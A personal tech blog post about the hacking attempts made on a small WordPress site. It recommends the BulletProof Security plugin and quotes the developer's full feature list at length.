The Internet Is a Dangerous Place
Today, having a website on the internet is like taking a walk through Jurassic Park with a couple of pounds of raw meat wrapped around your neck. If you don’t do something and do it quickly, at the very least you are most likely to get bitten, and/or most probably devoured. Let’s use this site as an example. The site is small, – in comparison to the number of users daily at Amazon, LarryTalksTech is hardly “used” at all. Though there is some advertisement, LarryTalksTech only provides technical information, for free. As a result, there are no credit card transactions, bit coins, or anything else that has any monetary substance. Sure, the site has original documents and photos, the writings themselves are copyrighted, and it’s all “intellectual property”, and on, but a user can view and read anything on it, once again, for FREE. Why then would anyone go through the trouble of hacking the site? Once inside, there is really nothing of any substantive value that could be turned into cash. All that being said, during the first 8 days of this month, my security logs show there have been nearly 200 attempts to hack the site, three attempts at brute force logins, and 14% of my bandwidth has been attempted to be appropriated via hot-linking. Some of this is being done by “bots”, and some of it has been done by, well…… actual people. Who cares how the attacks are implemented. The fact it that attacks are there, and very real. Considering the number of attacks LarryTalksTech have had, and the type of site it is, I shudder to think about the quantity of attacks a site would get if it was commercial, with credit card info, client lists, mailing lists, etc.
In all the years I have had this website, I have both tried and taken many steps to secure it. I have found that securing the website is an ongoing process as there always seem to be new and better ways to beat whatever security tools or processes that have been implemented. A very good way to “hedge your bet”, and increase the security of your website, is to use a security plugin. LarryTalksTech is built using WordPress. Because WordPress is so widely used, there are a lot of security plugins available for it. I have tried a number of them. One had my site so secure, that even I couldn’t log into it. Fortunately, there is one plugin that I found, and have now used for several years, that eclipses anything else I have tried: BulletProof Security.
BulletProof Security Features
Bullet Proof Security is probably as close to an all around security solution for your website as you will be able to find. Bullet Proof Security (or BPS) does not use a “silver bullet” (meaning one solution), it secures the website using a number of approaches. From the developer, here is an exhaustive list of its features for the current version:[1]
BulletProof Security
WordPress Website Security Protection: Firewall Security, Login Security, Database Security… Effective, Reliable, Easy to use…
BulletProof Security Feature Highlights
• .htaccess Website Security Protection (Firewalls)
• Login Security & Monitoring
• DB Backup – Manual and Scheduled
• DB Backup Logging
• DB Table Prefix Changer
• Security Logging
• HTTP Error Logging
• FrontEnd/BackEnd Maintenance Mode
• UI Theme Skin Changer
BulletProof Security Pro Feature Highlights
• 1 Click Setup Wizard
• AutoRestore Intrusion Detection & Prevention System (IDPS)
• Quarantine Intrusion Detection & Prevention System (IDPS)
• Real-time File Monitor (IDPS)
• DB Monitor Intrusion Detection System (IDS)
• DB Diff Tool – data comparison tool
• DB Backup – Manual and Scheduled
• DB Status & Info – extensive database status & info
• Plugin Firewall (True IP Based Firewall)
• JTC Anti-Spam / Anti-Hacker
• Uploads Folder Anti-Exploit Guard (UAEG)
• .htaccess Website Security Protection (Firewalls)
• Custom php.ini Website Security
• Login Security & Monitoring
Dashboard Alerting / Status Display & additional options/features
• F-Lock – Read Only File Locking
• FrontEnd/BackEnd Maintenance Mode
• Security Logging
• HTTP Error Logging
• PHP Error Logging
• DB Monitor Logging
• DB Backup Logging
• DB Table Prefix Changer
• AutoRestore/Quarantine Logging
• S-Monitor – Monitoring & Alerting Core
• Pro Tools – 16 mini-plugins
• Heads Up Dashboard Status Display
• UI Theme Skin Changer
BulletProof Security One-Click Method vs Multiple Separate Option Settings
BulletProof Security uses a one-click setup method vs breaking up options and settings into multiple separate different options and settings. One-click is used figuratively and not literally. One-click is the concept where several tasks are performed with one-click of a button. BPS BulletProof Modes setup actually takes 4 clicks, but with those 4 clicks BPS BulletProof Modes are setup and the website has maximum security enabled with all BPS security features and code enabled instead of having to choose multiple separate options and settings. Customization, whitelisting, adding BPS Bonus Custom Code or adding other personal custom .htaccess code is done with the BPS Custom Code feature.
htaccess Core Website Security (Security/Firewalls)
WordPress Website Security Protection: BulletProof Security protects your website against 100,000’s of different hacking attempts/attacks. The .htaccess security filters in BulletProof Security are designed to match malicious and nuisance attack patterns. The most important benefits of using a finite pattern matching method vs infinite banning/blocking individual IP’s, Host’s, Referer’s, etc. is that your website performance and Server resources are not negatively impacted. In general, BulletProof Security takes an “Action Approach” to website security. Hacker X, Spammer X, Bad Bot X does bad Action Y = Forbidden/Blocked. An “Action Approach” is a much more effective and performance optimized approach to website security since the bad action itself is being blocked/forbidden instead of attempting to block an individual hacker/spammer that performed a bad action. Example: BulletProof Security blocks all SQL Injection hacking attempts/attacks no matter who performed that SQL Injection hacking attempt/attack.
Login Security & Monitoring Website Security (Security/Monitoring)
Login Security & Login Monitoring: Log All User Account Logins or Log Only User Account Lockouts (see Screenshot). Brute Force Login Security Protection. Email alerting options allow you to choose 5 different email alerting options: Choose to have email alerts sent when a User Account is locked out, An Administrator Logs in, An Administrator Logs in and when a User Account is locked out, Any User logs in and when a User Account is locked out or Do Not Send Email Alerts. Choose Standard WP Error Messages or Generic Error Messages for Login Security Stealth Mode. Choose to Enable or Disable Login Password Reset capability for Login Security Stealth Mode. See BulletProof Security Login Security & Monitoring Features for additional features and options.
DB Backup: Database Backup Website Security (Security/Backup)
DB Backup: Create manual and scheduled Backup Jobs. Selective database table backup and full database backup. Scheduled backup job options: Hourly, Daily, Weekly and Monthly. Send scheduled backup zip file via email or just send email only, automatically delete old backup files after a certain period of time, etc., etc., etc. All DB Backup options/settings and default setup is done automatically during upgrades and new installations.
BulletProof Security is Website Performance Optimized (Performance/Optimization)
Website performance is just as important as website security. BulletProof Security is website performance optimized with website owners best interests at heart. BulletProof Security does NOT abuse the WordPress Database by making excessive MySQL Queries. BulletProof Security does NOT store excessive & non-essential data in your WordPress Database. BulletProof Security does NOT use excessive Server Memory & Resources. BulletProof Security does NOT use any gimmicks or bells & whistles that will cost website owners their website performance. The benefits of having website security protection are negated if your website is performing poorly/slowly, continually experiencing out of memory errors/running out of memory, database size growing exponentially with non-essential stored data, etc. BulletProof Security can actually speed up & improve your website performance by using the Speed Boost Cache Bonus Code. See the BulletProof Security Bonus Custom Code help section below.
FrontEnd/BackEnd Maintenance Mode (Security/Development)
Display a website under maintenance page with Countdown Timer to website visitors while the website displays and functions normally for you. When the Countdown Timer has completed (reached 0) an email reminder is sent to you to remind you that the Countdown Timer has completed. The new BPS Maintenance Mode design includes 20 background images, 15 center images (text box image), allows you to embed image files and YouTube videos, FrontEnd Maintenance Mode, BackEnd Maintenance Mode or both FrontEnd & BackEnd Maintenance Modes and most importantly is fast and simple to use so that you can switch in and out of Maintenance mode quickly and easily. FrontEnd Maintenance mode is primarily designed for development/maintenance purposes and BackEnd Maintenance Mode is technically a security feature since enabling BackEnd Maintenance Mode allows you to deny access to the /wp-admin folder/WP Dashboard by IP address. See BulletProof Security FrontEnd/BackEnd Maintenance Mode Features for additional features and options.
Why .htaccess Website Security Is So Much Better Than Other Types of Website Security
The answer is very simple – .htaccess files (distributed Server configuration files) are processed first before any other code on your website. In other words, hackers malicious scripts are stopped by BulletProof Security .htaccess files/Firewalls before those scripts even have a chance to reach the php code in WordPress. BulletProof Security uses .htaccess website security files, which are specific to Apache Linux Servers. Please read the FAQ page for Server compatibility questions.
BulletProof Security Additional Website Security Protection
WordPress is already very secure, but every website, no matter what type of platform it is built on should have additional website security measures in place as a standard. BulletProof Security provides that additional website security protection that every website should have.
Translations
• Lithuanian by Vincent G from Host1Free.com
• Filipino/Tagalog by pointen.dk
• Russian by EyeFinity
• If you would like to translate the BPS plugin to your language see this BPS Plugin Language Translation Tutorial. Please include a link to your website so that we can add it here. Thank you.
• Tip: If you use the Google Chrome Browser you can right mouse click in plugin pages and then click on Translate to… To translate plugin text into your Language.
BulletProof Security Bonus Custom Code
• Brute Force Login Protection .htaccess Code
• Speed Boost Cache .htaccess Code
• HotLink Protection .htaccess Code – Google, Yahoo, Bing safe
• Author ID / Username Bot Probe Protection .htaccess Code
• XML-RPC DDoS Protection .htaccess Code (Double Bonus: Trackback/Pingback Protection)
BulletProof Security htaccess Core (Firewalls, etc.) Features
• Root Folder BulletProof Mode/Firewall
• wp-admin Folder BulletProof Mode/Firewall
• Built-in .htaccess File Editor & File Manager
• Built-in .htaccess Backup and Restore
• One-click .htaccess website security protection from within the WP Dashboard
• .htaccess security protection against XSS, RFI, CRLF, CSRF, Base64, Code Injection and SQL Injection………. hacking attempts
• TimThumb Vulnerability/Exploit .htaccess security protection (Firewall)
• .htaccess Lock / Unlock (404 Read-Only)
• .htaccess AutoLock On or Off
• Security / HTTP Error Logging – Log 400, 403 and 404 Errors
• Security Log: Add / Remove User Agents/Bots to Ignore/Not Log or Allow/Log
• Security Log: Turn On / Turn Off / Delete Log
• Security Log Automation: Automatically zipped, emailed and replaced based on file size
• Automatic .htaccess file updating on BPS upgrade installation
• New .htaccess security filters automatically added during upgrade
• WP Dashboard Alerts / WP Dashboard Dismiss Notices
• Anti Comment Spam .htaccess code – works together with Akismet or other Spam plugins to keep Comment Spam at a minimum
• Anti Comment Spambot .htaccess code – Forbid Empty Referrer Spambots
• Author ID / User ID / Username Bot Probe Protection
• Custom Code feature: Add, Edit, Modify, Save additional Bonus or personal custom .htaccess code
• WordPress readme.html and /wp-admin/install.php protected with .htaccess security protection
• wp-config.php and bb-config.php files protected with .htaccess security protection
• php.ini and php5.ini files protected with .htaccess security protection
• WordPress database errors turned off – Verification and function insurance
• WordPress version is not displayed / not shown – WordPress version is removed
• WP Generator Meta Tag filtered – not displayed / not shown
• WP DB default admin username / account check
• System Info: PHP, MySQL, OS, Server, Memory Usage, IP, SAPI, WP Filesystem API Method, DNS, Max Upload, Zend Engine Version, Zend Guard/Optimizer, ionCube Loader, Suhosin, APC, eAccelerator, XCache, Varnish, cURL, Memcache, Memcached…
• Security Status Page – Displays website security status information
• File and Folder Permission Checking – CGI / DSO – SAPI check / display
• Help & FAQ page – links to BPS Guide and other detailed Help & Info pages
• Extensive Read Me! jQuery Dialog Help buttons throughout the BulletProof Security plugin pages
• Website Developer Maintenance Mode (503 website open to Developer / Site Owner ONLY)
• Log in / out of your website while in Maintenance Mode
• Customizable 503 Website Under Maintenance page
• HUD Success / Error message display
• i18n Language Translation coding
BulletProof Security Login Security & Monitoring Features
• Brute Force Login Security Protection
• Log All User Account Logins or Log Only User Account Lockouts
• Logged DB Fields: User ID, Username, Display Name, Email, Role, Login Time, Lockout Expires, IP Address, Hostname, Request URI
• Email Alerting Options: User Account is locked out, An Administrator Logs in, An Administrator Logs in and when a User Account is locked out, Any User logs in and when a User Account is locked out, Do Not Send Email Alerts
• Login Security Additional Options: Max Login Attempts, Automatic Lockout Time, Manual Lockout Time, Max DB Rows To Show, Turn On/Turn Off
• Login Security Stealth Mode: Standard WP Error Messages or Generic Error Messages.
• Login Security Stealth Mode: Enable or Disable Login Password Reset capability and links.
• Dynamic DB Form: Lock, Unlock, Delete
• Enhanced Search: Allows you to search all of the Login Security database rows/Fields
• Click the Login Security Read Me help button for full descriptions of all features and options.
BulletProof Security DB Backup/Database Backup Features
• Manual or scheduled database backups
• Scheduled backup job options: Hourly, Daily, Weekly and Monthly
• Send scheduled backup zip file via email or just send email only
• Selective database table backup and full database backup
• Automatically deletion of old backup files after a certain period of time
• Backup Jobs – Manual/Scheduled Accordion Tab
• Displays the Description/Job Name, Delete and Run Checkboxes, Job Type, Frequency, Last Backup, Next Backup, Email Backup and Job Created table columns.
• Backup Files – Download/Delete Accordion Tab
• Displays the Backup Filename, Delete Checkbox, Download Links, Backup Folder, Size and Date/Time table columns.
• Create Backup Jobs Accordion Tab
• Displays a dynamic DB Table Name checkbox form, Description/Backup Job Name, DB Backup Folder Location (default Obfuscated & Secure BPS Backup Folder location), DB Backup File Download Link/URL, Backup Job Type: Manual or Scheduled, Frequency of Scheduled Backup Job (recurring – Hourly, Daily, Weekly or Monthly), Hour When Scheduled Backup is Run (recurring – start time for a scheduled backup job), Day of Week When Scheduled Backup is Run (recurring – weekday day), Day of Month When Scheduled Backup is Run (recurring – day of the month), Send Scheduled Backup Zip File Via Email or Just Email Only – email zip backup file, do not email backup zip file, email and delete zip backup file or just send an email, Automatically Delete Old Backup Files (Never delete old backup files, delete backup files older than 1 day, 5 days, 10 days, 15 days, 30 days, 60 days, 90 days or 180 days), – Turn On/Off All Scheduled Backups (override – turn on all scheduled backups or turn off all scheduled backups).
• DB Backup Logging
• Depending on your DB Backup settings, log entries will be logged anytime you run a Manual Backup Job or whenever a Scheduled Cron Backup Job is run. The Backup Job Completion Time, Zip Backup File Name, timestamp and other information is logged. If you have chosen the option to automatically delete old zip backup files then the zip backup file name and timestamp will be logged when old zip backup files are automatically deleted. When you create a new Backup Job your Backup Job Settings are logged/saved in the DB Backup Log.
• DB Backup Log Automation: Automatically zipped, emailed and replaced based on file size
• Click the DB Backup Read Me help button for full descriptions of all features and options.
BulletProof Security FrontEnd/BackEnd Maintenance Mode Features
• FrontEnd Maintenance Mode, BackEnd Maintenance Mode or both FrontEnd & BackEnd Maintenance Modes
• Website displays & functions normally while visitors see a website under maintenance page
• TinyMCE WYSIWYG Editor
• Embed image files and YouTube videos
• 20 background images, 15 center images (text box image)
• Background image files/options and Center images (text box image) are independent of each other so that you can mix and match different background images with different Center images (text box image)
• Enable Countdown Timer
• Countdown Timer Text Color
• Maintenance Mode Time in Minutes
• Header Retry-After in Minutes ~ 503 HTTP Status Code
• Enable FrontEnd Maintenance Mode ~ site development, maintenance, coming soon, under construction, etc.
• Enable BackEnd Maintenance Mode ~ Deny All IP address .htaccess protection for the wp-admin folder / WP Dashboard
• Maintenance Mode IP Address Whitelist Text Box: Enter The IP Addresses That Can View The Website Normally (not in Maintenance Mode)
• Maintenance Mode Text, Images, Videos Displayed To Website Visitors
• Background Images ~ 20 background images ~ mix and match with center images ~ see screenshot
• Center Images ~ 15 center images ~ mix and match with background images ~ see screenshot
• Background Colors (If not using a Background Image)
• Display Visitor IP Address
• Display Admin/Login Link
• Display Dashboard Reminder Message when site is in Maintenance Mode
• Send Email Reminder when Maintenance Mode Countdown Timer has completed
• Email: To, From, cc, bcc
• Network/Multisite Primary Site Options ONLY
• Put The Primary Site And All Subsites In Maintenance Mode
• Put All Subsites In Maintenance Mode, But Not The Primary Site
• Click the Maintenance Mode Read Me help button for full descriptions of all features and options.
Summary
From the developer data above, you can see that BulletProof Security is very broad based security tool for your website. In addition to the many things it can do to protect your website, it also provides suggestions, like changing the permission settings (as well as providing the “ideal” settings) on key WordPress files. Finally, BPS provides two logs that I use daily: The Login Security Log displays who has logged in, and who has been locked out of the website after reaching a maximum number of unsuccessful attempts at logging in. In addition, the time of the login or attempted login is shown, as well as the IP address from where the person is attempting the login. The Security Log displays all blocked attempts to access the the website, why, IP address, time, etc.
I use the FREE version of BulletProof Security for my site. I have found that it not only meets the needs of my site, but has performed well for me for several years. If yours is a commercial site, the Pro version might be worth considering.
Even with BulletProof Security, I don’t for one minute believe my site is 100% secure, there are just too many variables involved in keeping it safe. In the end, security processes are mostly reactive, as there are a lot of skilled vermin out there with nothing better to do than trying to exploit your system, and in the process, trying new ways to carry out their task. One just has to stay vigilant and creative.
Sources
1. BulletProof Security | https://wordpress.org/plugins/bulletproof-security/